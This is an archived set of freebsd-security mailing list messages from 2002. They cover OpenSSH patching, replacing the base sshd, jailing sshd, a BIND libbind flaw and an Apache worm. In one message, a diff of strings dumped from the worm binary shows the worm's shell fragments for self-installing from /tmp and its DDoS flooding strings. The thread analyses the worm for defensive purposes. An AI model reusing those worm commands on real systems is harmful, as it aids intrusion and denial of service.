PGP utility. # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:13/openssh.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:13/openssh.patch.asc Execute the following commands as root: # cd /usr/src # patch < /path/to/sshd.patch # cd /usr/src/secure/lib/libssh # make depend && make all # cd /usr/src/secure/usr.sbin/sshd # make depend && make all install # cd /usr/src/secure/usr.bin/ssh # make depend && make all install __________________________________ -- Scott Gerhardt, P.Geo. Gerhardt Information Technologies [G-IT] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 17:52:52 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4915937B400; Fri, 28 Jun 2002 17:52:48 -0700 (PDT) Received: from blue.gerhardt-it.com (gw.gerhardt-it.com [204.83.38.103]) by mx1.FreeBSD.org (Postfix) with ESMTP id E6DBA43E0A; Fri, 28 Jun 2002 17:52:47 -0700 (PDT) (envelope-from scott@gerhardt-it.com) Received: from [192.168.100.111] (gw.gerhardt-it.com [204.83.38.103]) by blue.gerhardt-it.com (Postfix) with ESMTP id 26AEF10024; Fri, 28 Jun 2002 18:52:47 -0600 (CST) User-Agent: Microsoft-Entourage/10.1.0.2006 Date: Fri, 28 Jun 2002 18:52:40 -0600 Subject: Sshd fix From: Scott Gerhardt To: FreeBSD , Message-ID: Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org For the sshd fix, could't I just strip the base openssh from the system and install the updated openssh-3.4 from the ports? If so, what is the best method to disable/eliminate openssh from the base system? Have a happy Canada Day weekend :-) Regards, -- Scott Gerhardt, P.Geo. Gerhardt Information Technologies [G-IT] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 18: 7:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9749A37B408; Fri, 28 Jun 2002 18:07:38 -0700 (PDT) Received: from mail.XtremeDev.com (xtremedev.com [216.241.38.65]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0D23E43E06; Fri, 28 Jun 2002 18:07:38 -0700 (PDT) (envelope-from freebsd@XtremeDev.com) Received: from xtremedev.com (xtremedev.com [216.241.38.65]) by mail.XtremeDev.com (Postfix) with ESMTP id 07F7D70603; Fri, 28 Jun 2002 19:07:37 -0600 (MDT) Date: Fri, 28 Jun 2002 19:07:37 -0600 (MDT) From: FreeBSD user To: Scott Gerhardt Cc: FreeBSD , Subject: Re: Sshd fix In-Reply-To: Message-ID: <20020628190711.M7121-100000@Amber.XtremeDev.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org cd /usr/ports/security/openssh-portable && make -DOPENSSH_OVERWRITE_BASE install distclean On Fri, 28 Jun 2002, Scott Gerhardt wrote: > For the sshd fix, could't I just strip the base openssh from the system and > install the updated openssh-3.4 from the ports? > > If so, what is the best method to disable/eliminate openssh from the base > system? > > > Have a happy Canada Day weekend :-) > > Regards, > > > -- > Scott Gerhardt, P.Geo. > Gerhardt Information Technologies [G-IT] > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 18:11:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9C87637B401; Fri, 28 Jun 2002 18:11:45 -0700 (PDT) Received: from nycsmtp1out.rdc-nyc.rr.com (nycsmtp1out.rdc-nyc.rr.com [24.29.99.226]) by mx1.FreeBSD.org (Postfix) with ESMTP id C3C7243E09; Fri, 28 Jun 2002 18:11:44 -0700 (PDT) (envelope-from scottro@despammed.com) Received: from despammed.com (66-108-172-188.nyc.rr.com [66.108.172.188]) by nycsmtp1out.rdc-nyc.rr.com (8.12.1/Road Runner SMTP Server 1.0) with SMTP id g5T1B1s3005463; Fri, 28 Jun 2002 21:11:02 -0400 (EDT) Date: Fri, 28 Jun 2002 21:11:38 -0500 From: Scott Robbins To: Scott Gerhardt Cc: FreeBSD , freebsd-security@FreeBSD.ORG Subject: Re: Sshd fix Message-ID: <20020629021138.GA3460@scott1.homeunix.net> Mail-Followup-To: Scott Gerhardt , FreeBSD , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 28, 2002 at 06:52:40PM -0600, Scott Gerhardt wrote: > For the sshd fix, could't I just strip the base openssh from the system and > install the updated openssh-3.4 from the ports? > > If so, what is the best method to disable/eliminate openssh from the base > system? This is what I did, and it seems to work. (I'd be grateful if someone pointed out anything I did wrong. Part of it was gotten from a post by someone else, and the rest I figured out, for better or worse, on my own. cvsup ports to make sure you have 3.4. Make install. Edit /etc/rc.conf Change enable_sshd="YES" to a "NO" add the line sshd_program="/usr/local/sbin/ssshd" In /usr/local/etc/rc.d you'll find that it's put a script called sshd.sh.sample. Rename that to sshd.sh You've probably seen the various advisories that suggest taking the ChallengeResponse line and changing it to no (and uncomment it as well) Lastly, until I renamed /usr/sbin/sshd, it kept giving me the old version number--so, stop sshd, and rename /usr/sbin/sshd to something else. Then, start the new one /usr/local/sbin/sshd This seems to work. HTH Scott Robbins To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 18:17:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EE27A37B400 for ; Fri, 28 Jun 2002 18:17:27 -0700 (PDT) Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by mx1.FreeBSD.org (Postfix) with ESMTP id 15A7B43E06 for ; Fri, 28 Jun 2002 18:17:27 -0700 (PDT) (envelope-from cfaber@fpsn.net) Received: from fpsn.net (mirc-sucks@unixgr.com [63.224.69.60]) (authenticated) by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id g5T1HBt87191; Fri, 28 Jun 2002 19:17:12 -0600 (MDT) Message-ID: <3D1D0AA3.EAA3132C@fpsn.net> Date: Fri, 28 Jun 2002 19:17:23 -0600 From: Colin Faber Organization: fpsn.net, Inc. (http://www.fpsn.net) X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Domas Mituzas Cc: Brett Glass , Jonas M Luster , bugtraq@securityfocus.com, freebsd-security@FreeBSD.ORG Subject: Re: apache-worm.c References: <20020629020911.Q91607-100000@axis.tdd.lt> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Domas Hi, a quick review of my logs show all the way back to Jun 8th I've also had repeated attempts on different days from a sprint connection. [Sat Jun 8 18:11:46 2002] [error] [client 204.117.70.5] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): / [Sun Jun 9 03:34:26 2002] [error] [client 204.117.70.5] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): / [Wed Jun 12 23:45:00 2002] [error] [client 204.117.70.5] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): / [Thu Jun 13 05:36:10 2002] [error] [client 204.117.70.5] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): / [Thu Jun 13 20:29:30 2002] [error] [client 204.117.70.5] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): / [Sun Jun 16 19:15:18 2002] [error] [client 204.117.70.5] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): / Domas Mituzas wrote: > > Then, we can see, that the real worm is slightly modificated, but still, > it's quite similiar, so we can say it's same origin. Anyway, not too much > to fool about, we can obviously see some DDoS nature in it. But still, > there may be more functionality. > > Also, after some investigation on normal boxes I saw this worm-like > activity starting since Jun 25. Is it date of birth? Anyone seeing theese > lines? > > [Fri Jun 28 21:31:51 2002] [error] [client 213.154.128.145] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): / > > Regards, > Domas Mituzas > MicroLink Data > > midom@flock ~> make apache-worm 2>/dev/null > cc -O -pipe -march=pentiumpro apache-worm.c -o apache-worm > midom@flock ~> strings apache-worm | sort > a > midom@flock ~> strings .a | sort > b > --- b Sat Jun 29 02:11:44 2002 > +++ a Sat Jun 29 02:11:54 2002 > @@ -1,12 +1,18 @@ > !"#&(+,-./0123456789=>?@ABCDPQ > + / H > +$FreeBSD: src/lib/csu/i386-elf/crti.S,v 1.6 2002/05/15 04:19:49 obrien Exp $ > +$FreeBSD: src/lib/csu/i386-elf/crtn.S,v 1.5 2002/05/15 04:19:49 obrien Exp $ > %c%s > %d.%d.%d.%d > %s [base 2] ... > ,$s'1 > +,[^_] > +,[^_] > ----DATA---- > ----EMAILS---- > ----FROM---- > ----SUBJECT---- > +-Enc > .gov > .hlp > /bin > @@ -21,11 +27,15 @@ > /usr/libexec/ld-elf.so.1 > 12.127.17.71 > 127.0.0.1 > -8$t > -8/u > -8/u > -8/u > -: u' > +; u1 > +;tiB > +< v2 > +<0.t > +<[^_] > +<[^_] > +>F;u > +>F;u > +AAAA > Accept-Charset: iso-8859-1,*,utf-8 > Accept-Charset: iso-8859-1,*,utf-8 > Accept-Encoding: gzip > @@ -38,6 +48,8 @@ > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* > Accept: text/html, text/plain, text/sgml, */*;q=0.01 > Apache > +BBBB > +CCCCf > Cannot packet local networks > Checksum for data failed > Connection: Keep-Alive > @@ -50,6 +62,7 @@ > Dns flooding target > Error communicating with website > Error: %s > +F;50 > FreeBSD > FreeBSD 4.5 x86 / Apache/1.3.20 (Unix) > FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix) > @@ -63,63 +76,37 @@ > Host: %s > Host: %s:80 > Host: %s:80 > -Host: Unknown > Insufficient memory > Invalid IP > Invalid instance or socket > +L[^_] > Location > MAIL FROM:<%s> > Message-ID: <%x.%x.%x@aol.com> > Mime-Version: 1.0 > Operation Success > Operation pending > -POST / HTTP/1.1 > +POST > PPPP > PPPP > PQP1 > PQSP > -Ph $ > -Ph ' > -Ph B > -Ph B > -Ph J > -Ph J > -Ph+) > -Ph:( > -Ph>( > -PhA' > -PhA' > -PhD' > -PhD' > -PhG' > -PhG' > -PhG( > -PhJ' > -PhW( > -PhW) > -Ph`$ > -Phg' > Phn/shh//bi > -Phw) > -Pj-j > Port is in use > QUIT > RCPT TO:<%s> > Return-Path: <%c%c%c%c%c%c%c@aol.com> > -Rh5( > -Rh5( > -Rh=) > -RjFh` > SPP1 > Sending packets to target > Server: > Set-Cookie > Size must be less than or equal to 9216 > Subject: %s > +TTP/ > Tcp flooding target > Timed out while receiving data > To: %s > -Transfer-Encoding: chunked > +Tran > UNKNOWN-CHECKSUM-SUCCESSFUL > Udp flooding target > Unable to bind socket > @@ -135,9 +122,22 @@ > User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686) > User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686) > XXXXX -\WVS > +[^_] > +[^_] > +[^_] > +[^_] > +[^_] > +[^_] > +[^_] > +[^_] > +[^_] > +[^_] > +[^_] > +[^_] > +[^_] > _DYNAMIC > _GLOBAL_OFFSET_TABLE_ > +_Jv_RegisterClasses > __bss_start > __deregister_frame_info > __eof__ > @@ -155,69 +155,60 @@ > bcopy > begin 655 .a > bind > -bzero > -close > connect > ctime > dup2 > environ > execl > -exit > fclose > fcntl > +feof > +ferror > fgetc > fgets > find / -type f > fopen > fork > -fprintf > +fputs > fread > free > fseek > ftell > +g: c > gethostbyname > getpid > hBLE*h*GOB > hGGGG > http:// > +hunk > inet_addr > inet_ntoa > -j0h` > -j5h(( > -jqh` > -jqh` > -libc.so.4 > +libc.so.5 > malloc > memcpy > memset > mv /tmp/tmp /tmp/init;export PATH="/tmp";init %s > -open > +nkno > +odin > pclose > popen > -printf > -rand > -read > recv > recvfrom > remove > rm -rf /tmp/.a;cat > /tmp/.uua << __eof__; > select > sendto > +sfer > signal > -sleep > -snprintf > socket > -sprintf > srand > strcasecmp > strchr > strcmp > strcpy > strdup > -strlen > -strncmp > strtok > -time > +t: U > tolower > usleep > vsnprintf > @@ -225,3 +216,4 @@ > waitpid > webmaster@mydomain.com > write > +|[^_] > > On Fri, 28 Jun 2002, Brett Glass wrote: > > > At 05:58 PM 6/28/2002, Jonas M Luster wrote: > > > > >This seems to be a different source than the one, the binary was > > >compiled from. The binary uses a lynx version string while this one > > >uses User-Agent: Mozilla/4.75 [en] instead. > > > > Aha! Perhaps the worm's author was seeking to mislead Domas, and > > others, about what it did and how. > > > > --Brett > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Colin Faber (303) 736-5160 fpsn.net, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 18:34:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 42E3337B401 for ; Fri, 28 Jun 2002 18:34:28 -0700 (PDT) Received: from gate.volant.org (gate.volant.org [207.111.218.246]) by mx1.FreeBSD.org (Postfix) with ESMTP id C4ECF43E09 for ; Fri, 28 Jun 2002 18:34:27 -0700 (PDT) (envelope-from patl+freebsd@volant.org) Received: from 216-55-134-176.dsl.san-diego.abac.net ([216.55.134.176] helo=[192.168.0.13]) by gate.volant.org with asmtp (TLSv1:DES-CBC3-SHA:168) (Exim 3.33 #1) id 17O77z-000Nuf-00; Fri, 28 Jun 2002 18:34:19 -0700 Date: Fri, 28 Jun 2002 18:34:04 -0700 From: Pat Lashley To: Poul-Henning Kamp Cc: FreeBSD Security Mailling List Subject: Re: Jailing SSHd Message-ID: <188970000.1025314444@mccaffrey.phoenix.volant.org> X-Mailer: Mulberry/2.2.1 (Linux/x86 Demo) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --On Saturday, June 29, 2002 12:28:35 AM +0200 Poul-Henning Kamp=20 wrote: > In message <2849830000.1025137373@mccaffrey.phoenix.volant.org>, Pat > Lashley wr ites: >> >> --On Wednesday, June 26, 2002 09:07:36 PM +0200 Poul-Henning Kamp=3D20 >> wrote: >> >>> Which reminds me that we should really tweak the code and put it in a >>> jail instead of a chroot. >> >> Careful there. Some of us are using SSH to log into jails running >> virtual hosting environments. The default installation needs to be able >> to run if it is already within a jail when sshd is started. > > You could just fall back to chroot(2) if jail(2) failed. My point is that the DEFAULT installation and configuration must Do The Right Thing whether it is run in a jail or in the main server environment. An acceptable solution would be a startup script which was either smart enough to recognize when it is running in a jail, or which implements a chroot fallback if the attempt to jail the sshd fails. -Pat To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 19:49: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 358C637B400 for ; Fri, 28 Jun 2002 19:48:59 -0700 (PDT) Received: from a2.scoop.co.nz (aurora.scoop.co.nz [203.96.152.68]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6158743E09 for ; Fri, 28 Jun 2002 19:48:58 -0700 (PDT) (envelope-from andrew@scoop.co.nz) Received: from localhost (localhost [127.0.0.1]) by a2.scoop.co.nz (8.12.2/8.12.2) with ESMTP id g5T2muhU096882; Sat, 29 Jun 2002 14:48:57 +1200 (NZST) (envelope-from andrew@scoop.co.nz) Date: Sat, 29 Jun 2002 14:48:56 +1200 (NZST) From: Andrew McNaughton X-X-Sender: andrew@a2 To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: libc flaw: BIND 9 closes most holes but also opens one In-Reply-To: <200206282259.QAA03790@lariat.org> Message-ID: <20020629143708.R92518-100000@a2> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, 28 Jun 2002, Brett Glass wrote: > I've installed BIND 9 on our main domain name server to shield systems > (including Windows boxes, which may be vulnerable) from the libc hole. > Unfortunately, according to ISC, BIND 9 comes with a version of > libbind that's vulnerable. (See http://www.cert.org/advisories/CA-2002-19.html.) > So, if you load up BIND 9 and an app that uses it (such as Sendmail) links > to the vulnerable libbind, you're still exposed. You do have an advantage though in tha bind can run with reduced privileges and in a chroot dir. Much the same sort of protection that privilege separation in sshd affords. Given that unsafe privileged code is talking to bind, a compromised bind could perhaps be made to do evil things, but producing an exploit which modifies the executing code to that extent is no easy target. Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 20:18:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5C50637B400 for ; Fri, 28 Jun 2002 20:18:14 -0700 (PDT) Received: from sydmail3.telpacific.com.au (sydmail3.telpacific.com.au [203.88.240.16]) by mx1.FreeBSD.org (Postfix) with ESMTP id 072C343E06 for ; Fri, 28 Jun 2002 20:18:13 -0700 (PDT) (envelope-from iceger@rivernet.com.au) Received: from dun088255244i088229079.rivernet.com.au (dun088255244i088229079.rivernet.com.au [203.88.229.79]) by sydmail3.telpacific.com.au (8.11.5/8.11.5) with ESMTP id g5T3Ouh22918 for ; Sat, 29 Jun 2002 13:24:58 +1000 (EST) (envelope-from iceger@rivernet.com.au) Date: Sat, 29 Jun 2002 13:19:53 +0000 (GMT) From: Andrew Li X-X-Sender: To: Subject: OpenSSH_2.9 Message-ID: <20020629131600.P668-100000@freebsd.com.au> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi all, I'm not very up to date with SSH. Is this a known bug? If it is, is there a fix for it? freebsd%> ssh -V OpenSSH_2.9 FreeBSD localisations 20011202, SSH protocols 1.5/2.0, OpenSSL 0x0090601f freebsd%> ssh-keygen -p -f id_dsa Key has comment '' Enter new passphrase (empty for no passphrase): Enter same passphrase again: ssh-keygen in free(): warning: junk pointer, too high to make sense Your identification has been saved with the new passphrase. freebsd%> ssh-keygen -p -f id_rsa Key has comment '' Enter new passphrase (empty for no passphrase): Enter same passphrase again: ssh-keygen in free(): warning: junk pointer, too high to make sense Your identification has been saved with the new passphrase. Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 20:34:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2F69537B400 for ; Fri, 28 Jun 2002 20:34:32 -0700 (PDT) Received: from neptun.twoj.pl (neptun.goo.pl [80.48.39.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1BCE643E06 for ; Fri, 28 Jun 2002 20:34:31 -0700 (PDT) (envelope-from bugtraq-return-5412-cinek=goo.pl@securityfocus.com) Received: by neptun.twoj.pl (Postfix, from userid 107) id E0EC73AC09; Sat, 29 Jun 2002 05:34:23 +0200 (CEST) Received: from outgoing.securityfocus.com (outgoing3.securityfocus.com [66.38.151.27]) by neptun.twoj.pl (Postfix) with ESMTP id 586D73ABFB for ; Sat, 29 Jun 2002 05:34:23 +0200 (CEST) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by outgoing.securityfocus.com (Postfix) with QMQP id D0E6BA3548; Fri, 28 Jun 2002 21:03:36 -0600 (MDT) Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Id: List-Post: List-Help: List-Unsubscribe: List-Subscribe: Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Received: (qmail 19451 invoked from network); 28 Jun 2002 17:30:03 -0000 X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020628112127.024d9410@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Fri, 28 Jun 2002 11:27:13 -0600 To: flynn@energyhq.homeip.net, Domas Mituzas From: Brett Glass Subject: Re: Apache worm in the wild Cc: freebsd-security@FreeBSD.ORG, bugtraq@securityfocus.com, os_bsd@konferencijos.lt In-Reply-To: <20020628113834.GA10062@energyhq.homeip.net> References: <20020628125817.O68824-100000@axis.tdd.lt> <20020628125817.O68824-100000@axis.tdd.lt> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 05:38 AM 6/28/2002, flynn@energyhq.homeip.net wrote: >I wonder how many variants of this kind of thing we'll see, but I assume most people >running Apache have upgraded already. Upgrading Apache may prevent your system from being taken over, but it doesn't necessarily prevent it from being DoSed. One of my Apache servers, which had been upgraded to 2.0.39, went berserk on June 25th, spawning the maximum number of child processes and then locking up. The server did not appear to have been infiltrated, but the logs were filled with megabytes of messages indicating that the child processes were repeatedly trying to free chunks of memory that were already free. Probably the result of an attempted exploit going awry. (It could have been aimed at Linux, or at a different version of Apache; can't tell. But clearly it got somewhere, though not all the way.) --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 20:35:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 06C9237B400 for ; Fri, 28 Jun 2002 20:35:35 -0700 (PDT) Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2B83743E06 for ; Fri, 28 Jun 2002 20:35:33 -0700 (PDT) (envelope-from marka@drugs.dv.isc.org) Received: from drugs.dv.isc.org (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.12.3/8.12.3) with ESMTP id g5T3ZUm0059814; Sat, 29 Jun 2002 13:35:30 +1000 (EST) (envelope-from marka@drugs.dv.isc.org) Message-Id: <200206290335.g5T3ZUm0059814@drugs.dv.isc.org> To: Brett Glass Cc: security@FreeBSD.ORG From: Mark.Andrews@isc.org Subject: Re: libc flaw: BIND 9 closes most holes but also opens one In-reply-to: Your message of "Fri, 28 Jun 2002 16:59:25 CST." <200206282259.QAA03790@lariat.org> Date: Sat, 29 Jun 2002 13:35:30 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I've installed BIND 9 on our main domain name server to shield systems > (including Windows boxes, which may be vulnerable) from the libc hole. > Unfortunately, according to ISC, BIND 9 comes with a version of > libbind that's vulnerable. (See http://www.cert.org/advisories/CA-2002-19.htm > l.) > So, if you load up BIND 9 and an app that uses it (such as Sendmail) links > to the vulnerable libbind, you're still exposed. > > This problem may take even longer to mop up than I first thought (and I was > pessimistic to start with). I was slated to build a new server today, but > since 4.6-RELEASE-p1 isn't yet up on the Japanese snapshot server yet, > I think I'll wait. > > --Brett > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message Firstly lib/bind is *not* built by default. You have to explictly build it with "configure --enable-libbind". "libbind" is a *copy* of BIND 8's libbind which *is* fixed in 8.2.6 and 8.3.3. So don't enable libbind and if you have installed libbind from BIND 9, get one of the above BIND 8 releases and install there libbind. Mark -- Mark Andrews, Internet Software Consortium 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@isc.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 20:42: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0965237B401 for ; Fri, 28 Jun 2002 20:42:00 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 303CE43E13 for ; Fri, 28 Jun 2002 20:41:59 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 19223 invoked by alias); 29 Jun 2002 03:41:16 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 29 Jun 2002 03:41:16 -0000 Message-ID: <1025322076.19222.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: freebsd-security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 19217 invoked from network); 29 Jun 2002 03:41:16 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:16 -0000 Received: (qmail 9057 invoked by alias); 29 Jun 2002 03:36:34 -0000 Received: (qmail 9053 invoked from network); 29 Jun 2002 03:36:34 -0000 Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) by mail.securityfocus.com with SMTP; 29 Jun 2002 03:36:34 -0000 Received: (qmail 13950 invoked by uid 1001); 29 Jun 2002 03:40:08 -0000 MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Reply-To: bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com Subject: confirm unsubscribe from bugtraq@securityfocus.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. To confirm that you would like freebsd-security@freebsd.org removed from the bugtraq mailing list, please send an empty reply to this address: bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com Usually, this happens when you just hit the "reply" button. If this does not work, simply copy the address and paste it into the "To:" field of a new message. I haven't checked whether your address is currently on the mailing list. To see what address you used to subscribe, look at the messages you are receiving from the mailing list. Each message has your address hidden inside its return path; for example, mary@xdd.ff.com receives messages with return path: -mary=xdd.ff.com@securityfocus.com. Some mail programs are broken and cannot handle long addresses. If you cannot reply to this request, instead send a message to and put the entire address listed above into the "Subject:" line. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 19217 invoked from network); 29 Jun 2002 03:41:16 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:16 -0000 Received: (qmail 9057 invoked by alias); 29 Jun 2002 03:36:34 -0000 Received: (qmail 9053 invoked from network); 29 Jun 2002 03:36:34 -0000 Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) by mail.securityfocus.com with SMTP; 29 Jun 2002 03:36:34 -0000 Received: (qmail 13950 invoked by uid 1001); 29 Jun 2002 03:40:08 -0000 Date: 29 Jun 2002 